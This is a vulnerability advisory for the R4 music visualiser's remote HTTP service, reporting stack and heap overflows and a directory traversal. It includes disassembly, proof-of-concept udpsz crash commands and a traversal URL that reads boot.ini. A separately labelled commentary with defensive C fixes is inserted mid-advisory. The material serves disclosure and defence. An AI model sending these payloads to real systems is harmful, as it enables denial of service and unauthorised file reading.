R4 versions 1.25 and below suffer from stack overflows, a heap overflow, and a directory traversal vulnerability.
#######################################################################
Luigi Auriemma
Application: R4
http://r4.rabidhamster.org/R4/
Versions: <= 1.25
Platforms: Windows
Bugs: A] stack overflow
B] heap overflow
C] directory traversal
D] screenshot stack overflow
Exploitation: remote
Date: 09 Feb 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"R4 is a standalone OpenGL accelerated program which aims to produce
animated 3D graphics in real-time that twist and turn with the music."
It is widely used at parties and other events that need 3D animations
driven by the music currently playing.
#######################################################################
=======
2) Bugs
=======
R4 has an HTTP service, disabled by default, which allows it to be
controlled remotely; all of the following vulnerabilities are located in
this component.
-----------------
A] stack overflow
-----------------
Buffer overflow caused by calling sprintf() to build a log string from
the HTTP arguments received from the client into a stack buffer of
2 kilobytes (0x800 bytes):
0041ECD0 /$ 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]
0041ECD4 |. 81EC 00080000 SUB ESP,800
0041ECDA |. 85D2 TEST EDX,EDX
0041ECDC |. 75 05 JNZ SHORT R4.0041ECE3
0041ECDE |. BA 349C4B00 MOV EDX,R4.004B9C34
0041ECE3 |> 8B8C24 08080000 MOV ECX,DWORD PTR SS:[ESP+808]
0041ECEA |. 85C9 TEST ECX,ECX
0041ECEC |. 75 05 JNZ SHORT R4.0041ECF3
0041ECEE |. B9 349C4B00 MOV ECX,R4.004B9C34
0041ECF3 |> 8B8424 0C080000 MOV EAX,DWORD PTR SS:[ESP+80C]
0041ECFA |. 85C0 TEST EAX,EAX
0041ECFC |. 74 2E JE SHORT R4.0041ED2C
0041ECFE |. 53 PUSH EBX
0041ECFF |. 8A18 MOV BL,BYTE PTR DS:[EAX]
0041ED01 |. 84DB TEST BL,BL
0041ED03 |. 5B POP EBX
0041ED04 |. 74 26 JE SHORT R4.0041ED2C
0041ED06 |. 50 PUSH EAX
0041ED07 |. 51 PUSH ECX
0041ED08 |. 52 PUSH EDX
0041ED09 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]
0041ED0D |. 68 60654B00 PUSH R4.004B6560 ; "]%s>%s [%s]"
0041ED12 |. 50 PUSH EAX ; stack buffer
0041ED13 |. E8 7B3C0000 CALL R4.00422993 ; sprintf()
0041ED18 |. 83C4 14 ADD ESP,14
0041ED1B |. 8D5424 00 LEA EDX,DWORD PTR SS:[ESP]
0041ED1F |. 52 PUSH EDX
0041ED20 |. E8 2BFEFFFF CALL R4.0041EB50
0041ED25 |. 81C4 04080000 ADD ESP,804
0041ED2B |. C3 RETN
----------------
B] heap overflow
----------------
Heap overflow/corruption caused by a long HTTP URI.
----------------------
C] directory traversal
----------------------
Directory traversal exploitable through the "loadfile" script command,
which can be executed from left_console.html and allows viewing files on
the disk on which the software is installed.
----------------------------
D] screenshot stack overflow
----------------------------
Stack overflow through the "miniscreenshot" command:
0040B980 . 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]
0040B984 . 81EC 04010000 SUB ESP,104
...
0040BA1F . 8B15 109C4B00 MOV EDX,DWORD PTR DS:[4B9C10]
0040BA25 . 56 PUSH ESI
0040BA26 . 52 PUSH EDX
0040BA27 . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
0040BA2B . 68 F02A4B00 PUSH R4.004B2AF0 ; "%s/scene/%s.jpg"
0040BA30 . 50 PUSH EAX ; stack buffer
0040BA31 . E8 5D6F0100 CALL R4.00422993 ; sprintf()
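The advisory reports no vendor fix. As an added illustration in C (not code from the advisory or from R4), this is how bounded replacements for the two sprintf() calls in bugs A and D would look, using the buffer sizes read from the disassembly above, together with a hypothetical file-name check for the loadfile argument of bug C; all function names are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Buffer sizes taken from the disassembly above: 0x800 bytes for the log
 * line (bug A) and 0x104 bytes for the screenshot path (bug D). */
#define LOG_BUF_SIZE  0x800
#define PATH_BUF_SIZE 0x104

/* Bounded formatter: returns true only when the complete string fit. On
 * overflow the buffer is left empty instead of being overrun. The
 * "needed < 0" test also covers old MSVC runtimes whose _snprintf returns
 * -1 on truncation instead of the length that was needed. */
static bool bounded_format(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int needed = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    if (needed < 0 || (size_t)needed >= outsz) {
        out[0] = '\0';
        return false;
    }
    return true;
}

/* Safe replacement for the sprintf() at 0041ED0D ("]%s>%s [%s]"). */
static bool format_log_line(char *out, size_t outsz,
                            const char *a, const char *b, const char *c)
{
    return bounded_format(out, outsz, "]%s>%s [%s]", a, b, c);
}

/* Safe replacement for the sprintf() at 0040BA2B ("%s/scene/%s.jpg"). */
static bool format_screenshot_path(char *out, size_t outsz,
                                   const char *base, const char *name)
{
    return bounded_format(out, outsz, "%s/scene/%s.jpg", base, name);
}

/* Hypothetical check for the loadfile argument (bug C): accept only a bare
 * file name, so a value such as "../../../../../boot.ini" is refused. */
static bool is_safe_filename(const char *name)
{
    if (name == NULL || name[0] == '\0') return false;
    if (strchr(name, '/') || strchr(name, '\\') || strchr(name, ':')) return false;
    return strstr(name, "..") == NULL;
}
```

With a 3000-byte argument like the one PoC A sends, format_log_line() returns false and leaves the buffer empty instead of writing past the 0x800-byte stack buffer.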
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
A]
udpsz -T -b a -c "GET /?" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 3000
B]
udpsz -T -b a -c "GET /" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 20000
C]
http://SERVER:8888/left_console.html?cmd=loadfile([../../../../../boot.ini])
D]
udpsz -T -b a -c "GET /left_console.html?cmd=miniscreenshot([" 0 -c "]) HTTP/1.0\r\n\r\n" -1 SERVER 8888 500
#######################################################################
======
4) Fix
======
No fix.
#######################################################################